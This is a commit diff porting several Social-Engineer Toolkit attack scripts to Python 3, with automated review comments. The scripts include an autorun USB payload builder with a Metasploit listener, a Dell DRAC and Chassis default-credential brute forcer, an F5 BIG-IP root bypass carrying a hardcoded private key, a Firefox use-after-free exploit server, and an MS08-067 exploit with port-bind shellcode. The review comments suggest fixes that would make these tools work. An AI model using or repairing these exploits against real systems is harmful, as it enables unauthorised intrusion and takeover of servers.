pep8 and python3 refactoring goodness

This commit is contained in:
TrustedSec 2016-01-14 16:26:35 -05:00
parent 4048f03ea4
commit 633a59779b
15 changed files with 588 additions and 412 deletions


@ -15,24 +15,27 @@ me = mod_name()
trigger = 0
if check_options("INFECTION_MEDIA=") == "ON":
#if os.path.isfile(setdir + "/standardpayload.file"):
trigger = 1
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> /dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" % (setdir,setdir,setdir,setdir), shell=True).wait()
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> /dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir, setdir), shell=True).wait()
if os.path.isfile(setdir + "/fileformat.file"):
trigger = 2
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" %
(setdir, setdir), shell=True).wait()
if os.path.isfile(setdir + "/dll/openthis.wab"):
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
trigger = 3
if not os.path.isdir(setdir + "/autorun"): os.makedirs (setdir + "/autorun/")
filewrite = file(setdir + "/autorun/autorun.inf", "w")
if not os.path.isdir(setdir + "/autorun"):
os.makedirs(setdir + "/autorun/")
filewrite = open(setdir + "/autorun/autorun.inf", "w")
# if using standard payloads
if trigger == 1:
payload = "program.exe" #"" + alpha_data + "\""
payload = "program.exe" # "" + alpha_data + "\""
# if using pdf payload
if trigger == 2:
@ -45,31 +48,36 @@ filewrite.write("""[autorun]
open=%s
icon=autorun.ico""" % (payload))
filewrite.close()
print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
print_status(
"Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
print_status(
"Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger == 1 or trigger == 2 or trigger == 3:
choice1 = yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the listener
if not os.path.isfile(setdir + "/meta_config"):
filewrite = file(setdir + "/meta_config", "w")
fileopen = file(setdir + "/payload.options", "r")
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload " + line[0] + "\n")
filewrite.write("set lhost " + line[1] + "\n")
filewrite.write("set lport " + line[2] + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(setdir + "/meta_config"):
filewrite = open(setdir + "/meta_config", "w")
fileopen = open(setdir + "/payload.options", "r")
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload " + line[0] + "\n")
filewrite.write("set lhost " + line[1] + "\n")
filewrite.write("set lport " + line[2] + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
# create the listener
print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("%smsfconsole -r %s/meta_config" % (msf_path, setdir), shell=True).wait()
# create the listener
print_status(
"Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("%smsfconsole -r %s/meta_config" %
(msf_path, setdir), shell=True).wait()
else:
print_warning("cancelling...")
sleep (2)
sleep(2)
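Review bot: `fileopen = open(setdir + "/payload.options", "r")` on L72 is never closed, and `line = line.split(" ")` on L74 is indexed as `line[1]` and `line[2]` on L77-78 with no check that the line has three fields, so a blank or short line raises `IndexError` after `meta_config` has been partly written. Read it as `with open(setdir + "/payload.options") as fileopen:` and skip any line with fewer than three fields before writing. Separately, the `rm -rf … ; mkdir … ; cp …` chains on L17, L22 and L26 interpolate `setdir` into a `shell=True` string; `shutil.rmtree`, `os.makedirs` (already used on L32) and `shutil.copy` do the same work without a shell and without depending on the path being free of metacharacters. The enclosing top-level script starts and ends outside these hunks.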


@ -1,6 +0,0 @@
rel1k:
- add ability to read in port number and IP address (ie. ip:1433)
j0fer:
Add configuration option in set_config to specify sendmail location. Currently hard coded.


@ -1,2 +0,0 @@
0193d0
font: century gothic


@ -10,10 +10,11 @@ import pexpect
# this will load the database
def prep(database, ranges):
print "\n"
setcore.PrintStatus("Prepping the answer file based on what was specified.")
print("\n")
setcore.PrintStatus(
"Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite=file("src/program_junk/autopwn.answer", "w")
filewrite = open("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
@ -22,7 +23,8 @@ def prep(database, ranges):
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
filewrite.close()
setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n")
setcore.PrintStatus(
"Answer file has been created and prepped for delivery into Metasploit.\n")
def launch():
@ -31,25 +33,30 @@ def launch():
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..")
setcore.PrintStatus(
"Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn("%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path,setdir))
child = pexpect.spawn(
"%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path, setdir))
child.interact()
# handle exceptions and log them
except Exception, error: setcore.log(error)
except Exception as error:
setcore.log(error)
def do_autopwn():
print 'Doing do_autopwn'
print('Doing do_autopwn')
# pull the metasploit database
database = setcore.meta_database()
range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)"))
range = input(setcore.setprompt(
["19", "20"], "Enter the IP ranges to attack (nmap syntax only)"))
# prep the answer file
prep(database, range)
confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]"))
confirm_attack = input(setcore.setprompt(
["19", "20"], "You are about to attack systems are you sure [y/n]"))
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":
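Review bot: The format string on L143, `"%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path, setdir)`, begins with `%m`, which is not a valid conversion, so the `%` raises `ValueError` before `pexpect.spawn` is ever called and the `except Exception as error` on L147 merely logs it. The first placeholder should be `%s`, as the same pattern already reads on L88: `"%smsfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path, setdir)`. `range = input(...)` on L155 shadows the builtin `range`; a name such as `ip_range` avoids that. `prep()` on L121 opens `filewrite` without `with` and relies on the `close()` in the next hunk; `launch()` and `do_autopwn()` both continue outside their hunks.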


@ -12,13 +12,14 @@
# @TrustedSec
#
##########################################
import urllib
import urllib2
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import re
import threading
import sys
import time
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
@ -59,130 +60,144 @@ class bcolors:
self.backWhite = ''
self.DARKCYAN = ''
print "\n"
print "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
print "Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer"
print ""
print "Written by Dave Kennedy @ TrustedSec"
print "https://www.trustedsec.com"
print "@TrustedSec and @HackingDave"
print "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
print ""
print "This attack vector can be used to identify default installations"
print "of Dell DRAC and Chassis installations. Once found, you can use"
print "the remote administration capabilties to mount a virtual media"
print "device and use it to load for example Back|Track or password"
print "reset iso. From there, add yourself a local administrator account"
print "or dump the SAM database. This will allow you to compromise the"
print "entire infrastructure. You will need to find a DRAC instance that"
print "has an attached server and reboot it into the iso using the virtual"
print "media device."
print ""
print "Enter the IP Address or CIDR notation below. Example: 192.168.1.1/24"
print ""
ipaddr = raw_input("Enter the IP or CIDR: ")
print("\n")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer")
print("")
print("Written by Dave Kennedy @ TrustedSec")
print("https://www.trustedsec.com")
print("@TrustedSec and @HackingDave")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("")
print("This attack vector can be used to identify default installations")
print("of Dell DRAC and Chassis installations. Once found, you can use")
print("the remote administration capabilties to mount a virtual media")
print("device and use it to load for example Back|Track or password")
print("reset iso. From there, add yourself a local administrator account")
print("or dump the SAM database. This will allow you to compromise the")
print("entire infrastructure. You will need to find a DRAC instance that")
print("has an attached server and reboot it into the iso using the virtual")
print("media device.")
print("")
print("Enter the IP Address or CIDR notation below. Example: 192.168.1.1/24")
print("")
ipaddr = input("Enter the IP or CIDR: ")
# try logging into DRAC, chassis is something different
def login_drac(ipaddr_single):
# default post string
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (ipaddr_single)
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (
ipaddr_single)
# post parameters
opts = {
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
# URL encode it
data = urllib.urlencode(opts)
data = urllib.parse.urlencode(opts)
# our headers to pass (taken from raw post)
headers = {
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
}
# request the page
req = urllib2.Request(url, data, headers)
req = urllib.request.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
response = urllib.request.urlopen(req, timeout=2)
data = response.read()
# if we failed our login, just pass through
if "Failure_Login_IPMI_Then_LDAP" in data:
pass
# Failure_No_Free_Slot means there are no sessions available need to log someone off
# Failure_No_Free_Slot means there are no sessions available need to
# log someone off
if "Failure_No_Free_Slot" in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single))
print((bcolors.YELLOW + "[!]" + bcolors.ENDC +
" There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single)))
global global_check1
global_check1 = 1
# if we are presented with a username back, we are golden
if "'USERNAME' : 'root'" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single)
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single))
global global_check2
global_check2 = 1
# handle failed attempts and move on
except: pass
except:
pass
# these are for the centralized dell chassis
def login_chassis(ipaddr_single):
# our post URL
url = "https://%s/cgi-bin/webcgi/login" % (ipaddr_single)
# our post parameters
opts = {
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
# url encode
data = urllib.urlencode(opts)
data = urllib.parse.urlencode(opts)
# headers (taken from raw POST)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
# request the page
req = urllib2.Request(url, data, headers)
req = urllib.request.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
response = urllib.request.urlopen(req, timeout=2)
data = response.read()
# if we failed to login
if "login_failed_hr_top" in data:
pass # login failed
pass # login failed
# to many people logged in at a given time
if 'Connection refused, maximum sessions already in use.' in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single))
print((bcolors.YELLOW + "[!]" + bcolors.ENDC +
" There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single)))
global global_check3
global_check3 = 1
# successful guess of passwords
if "/cgi-bin/webcgi/index" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single)
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single))
global global_check4
global_check4 = 1
# except and move on for failed login attempts
except: pass
except:
pass
# this will check to see if we are using
# a valid IP address for scanning
def is_valid_ip(ip):
pattern = re.compile(r"""
^
@ -221,13 +236,15 @@ def is_valid_ip(ip):
return pattern.match(ip) is not None
# convert to 32 bit binary from standard format
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
if q != "":
b += dec2bin(int(q),8)
b += dec2bin(int(q), 8)
outQuads -= 1
while outQuads > 0:
b += "00000000"
@ -235,28 +252,35 @@ def ip2bin(ip):
return b
# decimal to binary conversion
def dec2bin(n,d=None):
def dec2bin(n, d=None):
s = ""
while n>0:
if n&1:
s = "1"+s
while n > 0:
if n & 1:
s = "1" + s
else:
s = "0"+s
s = "0" + s
n >>= 1
if d is not None:
while len(s)<d:
s = "0"+s
if s == "": s = "0"
while len(s) < d:
s = "0" + s
if s == "":
s = "0"
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0,len(b),8):
ip += str(int(b[i:i+8],2))+"."
for i in range(0, len(b), 8):
ip += str(int(b[i:i + 8], 2)) + "."
return ip[:-1]
# print a list of IP addresses based on the CIDR block specified
def scan(ipaddr):
if "/" in ipaddr:
parts = ipaddr.split("/")
@ -269,26 +293,29 @@ def scan(ipaddr):
counter = 0
# capture the threads
threads = []
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
ipaddr_single = bin2ip(ipPrefix+dec2bin(i, (32-subnet)))
ipPrefix = baseIP[:-(32 - subnet)]
for i in range(2**(32 - subnet)):
ipaddr_single = bin2ip(ipPrefix + dec2bin(i, (32 - subnet)))
# if we are valid proceed
ip_check = is_valid_ip(ipaddr_single)
if ip_check != False:
# do this to limit how fast it can scan, anything more causes CPU to hose
# do this to limit how fast it can scan, anything more
# causes CPU to hose
if counter > 255:
# put a small delay in place
time.sleep(0.1)
# increase counter until 255 then delay 0.1
counter = counter + 1
# start our drac BF
thread = threading.Thread(target=login_drac, args=(ipaddr_single,))
thread = threading.Thread(
target=login_drac, args=(ipaddr_single,))
# create a list of our threads in a dictionary
threads.append(thread)
# start the thread
thread.start()
# same as above just on the chassis
thread = threading.Thread(target=login_chassis, args=(ipaddr_single,))
thread = threading.Thread(
target=login_chassis, args=(ipaddr_single,))
# append the thread
threads.append(thread)
# start the thread
@ -304,8 +331,10 @@ def scan(ipaddr):
login_chassis(ipaddr)
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Scanning IP addresses, this could take a few minutes depending on how large the subnet range...")
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " As an example, a /16 can take an hour or two.. A slash 24 is only a couple seconds. Be patient.")
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Scanning IP addresses, this could take a few minutes depending on how large the subnet range..."))
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" As an example, a /16 can take an hour or two.. A slash 24 is only a couple seconds. Be patient."))
# set global variables to see if we were successful
global_check1 = 0
@ -316,9 +345,11 @@ global_check4 = 0
# kick off the scan
scan(ipaddr)
if global_check1 or global_check2 or global_check3 or global_check4 == 1:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)")
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)"))
else:
print (bcolors.RED + "[!]" + bcolors.ENDC + " Sorry, unable to find any of the Dell servers with default creds..Good luck :(")
print((bcolors.RED + "[!]" + bcolors.ENDC +
" Sorry, unable to find any of the Dell servers with default creds..Good luck :("))
raw_input("Press {return} to exit.")
input("Press {return} to exit.")
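Review bot: The bare `except: pass` on L305-306 (and again on L374-375) now swallows errors this port itself introduces, so a broken check is indistinguishable from a failed login: `" … are legit on IP: " % (ipaddr_single)` on L293 has no `%s` and raises `TypeError`, and `response.read()` on L283 returns bytes under Python 3, so the `in` tests against str literals on L285, L290 and L297 raise `TypeError` as well. Narrow it to `except OSError:` (which covers `urllib.error.URLError` and socket timeouts) so only network failures are skipped, and change L293 to `+ ipaddr_single` as L300 already does. `if global_check1 or global_check2 or global_check3 or global_check4 == 1:` on L481 applies `== 1` only to the last operand; `if 1 in (global_check1, global_check2, global_check3, global_check4):` says what was meant. The import on L174 repeats L173 (2to3 expanded both `urllib` and `urllib2` to the same three modules); keep one. `login_drac`, `login_chassis` and `scan` all continue outside their hunks.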


@ -6,9 +6,10 @@
# http://www.trustedsec.com
#
#
import subprocess,os
import subprocess
import os
filewrite = file("priv.key", "w")
filewrite = open("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
@ -26,13 +27,13 @@ LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
print """
print("""
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.trustedsec.com
"""
ipaddr=raw_input("Enter the IP address of the F5: ")
""")
ipaddr = input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
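Review bot: `open("priv.key", "w")` on L502 creates the key file with the process umask (commonly 0644), and only the `chmod 700` spawned through a shell on L509 tightens it afterwards, so the private key is readable by other local users between the two calls. Create it restricted from the start with `os.fdopen(os.open("priv.key", os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600), "w")`, or at least call `os.chmod("priv.key", 0o600)` instead of spawning a shell. The `ssh -i priv.key root@%s` command on L519 interpolates the value typed at the prompt into a `shell=True` string; `subprocess.Popen(["ssh", "-i", "priv.key", "root@" + ipaddr]).wait()` passes it as one argument with no shell parsing. `filewrite` is closed explicitly on L508 but a `with` block would also cover the case where the write raises.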


@ -1,7 +1,7 @@
#!/usr/bin/env python
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr_Me
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
import sys
try:
@ -10,6 +10,7 @@ try:
except ImportError:
pass
class myRequestHandler(BaseHTTPRequestHandler):
try:
def do_GET(self):
@ -17,7 +18,7 @@ class myRequestHandler(BaseHTTPRequestHandler):
self.printCustomHTTPResponse(200)
if self.path == "/":
target=self.client_address[0]
target = self.client_address[0]
self.wfile.write("""
<html>
<body>
@ -142,11 +143,13 @@ trigger();
</html>
""")
self.wfile.write("""<title>Please wait...</title></head><body>""")
self.wfile.write(
"""<title>Please wait...</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White">
Please wait<br>""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 4444 [-]" % (target))
print((
"\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 4444 [-]" % (target)))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
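Review bot: The `self.wfile.write("""…""")` calls on L544 and L551-554 still pass `str`; with the `http.server` imports on L529-530 the handler's `wfile` is a binary stream, so every one of these writes raises `TypeError` under Python 3 — the commit converted the imports and the `print`, but not the writes. Write bytes instead, e.g. `self.wfile.write(b"""<title>Please wait...</title></head><body>""")`, or `.encode()` the assembled string once. The `try:` opened on L537 wraps the method definitions in the class body; its `except` is outside this hunk, so I can't tell what it guards, but a one-line comment there would help the next reader. `do_GET` starts on L538 and continues outside the hunk.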


@ -10,31 +10,31 @@ from src.core.setcore import *
import struct
import sys
import time
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
from threading import Thread # Thread is imported incase you would like to modify
# the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
except ImportError as _:
print('Install the following library to make this script work')
print('Impacket : http://oss.coresecurity.com/projects/impacket.html')
print('PyCrypto : http://www.amk.ca/python/code/crypto.html')
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
print('#######################################################################')
print('# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)')
print('# www.hackingspirits.com')
print('# www.coffeeandsecurity.com')
print('# Email: d3basis.m0hanty @ gmail.com')
print('#######################################################################\n')
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
# Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
@ -59,95 +59,100 @@ shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
# Payload for Windows 2000 target
payload_1 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1 += '\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1 += '\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1 += '\x41\x41'
payload_1 += '\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\xeb\xcc'
payload_1 += '\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
# Payload for Windows 2003[SP2] target
payload_2 = '\x41\x00\x5c\x00'
payload_2 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2 += '\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2 += '\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2 += '\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2 += '\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2 += '\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2 += '\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2 += '\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2 += '\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2 += '\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
target = raw_input("Enter the IP address you want to attack: ")
print "Select target:\n\n 1. Windows 2000\n 2. Windows 2003 SP2\n"
osver = raw_input("Enter the target operating system number: ")
target = input("Enter the IP address you want to attack: ")
print("Select target:\n\n 1. Windows 2000\n 2. Windows 2003 SP2\n")
osver = input("Enter the target operating system number: ")
if osver == "1":
osver = payload_1
print '[-]Windows 2000 payload loaded'
print('[-]Windows 2000 payload loaded')
if osver == "2":
osver=payload_2
print '[-]Windows 2003[SP2] payload loaded'
osver = payload_2
print('[-]Windows 2003[SP2] payload loaded')
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
print('[-]Initiating connection')
self.__trans = transport.DCERPCTransportFactory(
'ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
print('[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__dce = self.__trans.DCERPC_class(self.__trans)
